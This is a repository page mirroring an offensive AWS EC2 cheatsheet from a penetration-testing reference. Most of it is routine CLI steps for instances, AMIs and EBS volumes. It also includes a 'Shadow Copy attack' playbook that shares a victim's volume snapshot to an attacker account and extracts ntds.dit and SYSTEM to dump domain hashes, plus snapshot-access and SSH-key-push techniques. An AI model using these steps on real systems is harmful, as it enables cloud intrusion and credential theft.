daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

aws-ec2.md (5995B)


      1 ---
      2 title: "AWS - Service - EC2"
      3 section: "Cloud"
      4 sectionSlug: "cloud"
      5 sourcePath: "docs/cloud/aws/aws-ec2.md"
      6 sourceUrl: "https://github.com/swisskyrepo/InternalAllTheThings/blob/203bb0c0b290/docs/cloud/aws/aws-ec2.md"
      7 sha: "203bb0c0b290"
      8 isIndex: false
      9 ---
     10 
     11 # AWS - Service - EC2
     12 
     13 * [dufflebag](https://labs.bishopfox.com/dufflebag) - Find secrets that are accidentally exposed via Amazon EBS's "public" mode
     14 
     15 ## Listing Information About EC2
     16 
     17 ```ps1
     18 aws ec2 describe-instances
     19 aws ec2 describe-instances --region region
     20 aws ec2 describe-instances --instance-ids ID
     21 ```
     22 
     23 ## Copy EC2 using AMI Image
     24 
     25 First you need to extract data about the current instances and their AMI/security groups/subnet : `aws ec2 describe-images --region eu-west-1`
     26 
     27 ```powershell
     28 # create a new image for the instance-id
     29 $ aws ec2 create-image --instance-id i-0438b003d81cd7ec5 --name "AWS Audit" --description "Export AMI" --region eu-west-1  
     30 
     31 # add key to AWS
     32 $ aws ec2 import-key-pair --key-name "AWS Audit" --public-key-material file://~/.ssh/id_rsa.pub --region eu-west-1  
     33 
     34 # create ec2 using the previously created AMI, use the same security group and subnet to connect easily.
     35 $ aws ec2 run-instances --image-id ami-0b77e2d906b00202d --security-group-ids "sg-6d0d7f01" --subnet-id subnet-9eb001ea --count 1 --instance-type t2.micro --key-name "AWS Audit" --query "Instances[0].InstanceId" --region eu-west-1
     36 
     37 # now you can check the instance 
     38 aws ec2 describe-instances --instance-ids i-0546910a0c18725a1 
     39 
     40 # If needed : edit groups
     41 aws ec2 modify-instance-attribute --instance-id "i-0546910a0c18725a1" --groups "sg-6d0d7f01"  --region eu-west-1
     42 
     43 # be a good guy, clean our instance to avoid any useless cost
     44 aws ec2 stop-instances --instance-id "i-0546910a0c18725a1" --region eu-west-1 
     45 aws ec2 terminate-instances --instance-id "i-0546910a0c18725a1" --region eu-west-1
     46 ```
     47 
     48 ## Mount EBS volume to EC2 Linux
     49 
     50 :warning: EBS snapshots are block-level incremental, which means that every snapshot only copies the blocks (or areas) in the volume that had been changed since the last snapshot. To restore your data, you need to create a new EBS volume from one of your EBS snapshots. The new volume will be a duplicate of the initial EBS volume on which the snapshot was taken.
     51 
     52 1. Head over to EC2 –> Volumes and create a new volume of your preferred size and type.
     53 2. Select the created volume, right click and select the "attach volume" option.
     54 3. Select the instance from the instance text box as shown below : `attach ebs volume`
     55 
     56     ```powershell
     57     aws ec2 create-volume –snapshot-id snapshot_id --availability-zone zone
     58     aws ec2 attach-volume –-volume-id volume_id –-instance-id instance_id --device device
     59     ```
     60 
     61 4. Now, login to your ec2 instance and list the available disks using the following command : `lsblk`
     62 5. Check if the volume has any data using the following command : `sudo file -s /dev/xvdf`
     63 6. Format the volume to ext4 filesystem  using the following command : `sudo mkfs -t ext4 /dev/xvdf`
     64 7. Create a directory of your choice to mount our new ext4 volume. I am using the name “newvolume” : `sudo mkdir /newvolume`
     65 8. Mount the volume to "newvolume" directory using the following command : `sudo mount /dev/xvdf /newvolume/`
     66 9. cd into newvolume directory and check the disk space for confirming the volume mount : `cd /newvolume; df -h .`
     67 
     68 ## Shadow Copy attack
     69 
     70 **Requirements**:
     71 
     72 * EC2:CreateSnapshot
     73 * [Static-Flow/CloudCopy](https://github.com/Static-Flow/CloudCopy)
     74 
     75 **Exploit**:
     76 
     77 1. Load AWS CLI with Victim Credentials that have at least CreateSnapshot permissions
     78 2. Run `"Describe-Instances"` and show in list for attacker to select
     79 3. Run `"Create-Snapshot"` on volume of selected instance
     80 4. Run `"modify-snapshot-attribute"` on new snapshot to set `"createVolumePermission"` to attacker AWS Account
     81 5. Load AWS CLI with Attacker Credentials
     82 6. Run `"run-instance"` command to create new linux ec2 with our stolen snapshot
     83 7. Ssh run `"sudo mkdir /windows"`
     84 8. Ssh run `"sudo mount /dev/xvdf1 /windows/"`
     85 9. Ssh run `"sudo cp /windows/Windows/NTDS/ntds.dit /home/ec2-user"`
     86 10. Ssh run `"sudo cp /windows/Windows/System32/config/SYSTEM /home/ec2-user"`
     87 11. Ssh run `"sudo chown ec2-user:ec2-user /home/ec2-user/*"`
     88 12. SFTP get `"/home/ec2-user/SYSTEM ./SYSTEM"`
     89 13. SFTP get `"/home/ec2-user/ntds.dit ./ntds.dit"`
     90 14. locally run `"secretsdump.py -system ./SYSTEM -ntds ./ntds.dit local -outputfile secrets'`, expects secretsdump to be on path
     91 
     92 ## Access Snapshots
     93 
     94 1. Get the `owner-id`
     95 
     96     ```powershell
     97     $ aws --profile flaws sts get-caller-identity
     98     "Account": "XXXX26262029",
     99     ```
    100 
    101 2. List snapshots
    102 
    103     ```powershell
    104     $ aws --profile flaws ec2 describe-snapshots --owner-id XXXX26262029 --region us-west-2
    105     "SnapshotId": "snap-XXXX342abd1bdcb89",
    106     ```
    107 
    108 3. Create a volume using the previously obtained `snapshotId`
    109 
    110     ```powershell
    111     aws --profile swk ec2 create-volume --availability-zone us-west-2a --region us-west-2  --snapshot-id  snap-XXXX342abd1bdcb89
    112     ```
    113 
    114 4. In AWS console, deploy a new EC2 Ubuntu based, attach the volume and then mount it on the machine.
    115 
    116     ```ps1
    117     ssh -i YOUR_KEY.pem  ubuntu@ec2-XXX-XXX-XXX-XXX.us-east-2.compute.amazonaws.com
    118     lsblk
    119     sudo file -s /dev/xvda1
    120     sudo mount /dev/xvda1 /mnt
    121     ```
    122 
    123 ## Instance Connect
    124 
    125 Push an SSH key to EC2 instance
    126 
    127 ```powershell
    128 # https://aws.amazon.com/fr/blogs/compute/new-using-amazon-ec2-instance-connect-for-ssh-access-to-your-ec2-instances/
    129 $ aws ec2 describe-instances --profile uploadcreds --region eu-west-1 | jq ".[][].Instances | .[] | {InstanceId, KeyName, State}"
    130 $ aws ec2-instance-connect send-ssh-public-key --region us-east-1 --instance-id INSTANCE --availability-zone us-east-1d --instance-os-user ubuntu --ssh-public-key file://shortkey.pub --profile uploadcreds
    131 ```
    132 
    133 ## References
    134 
    135 * [How to Attach and Mount an EBS volume to EC2 Linux Instance - AUGUST 17, 2016](https://devopscube.com/mount-ebs-volume-ec2-instance/)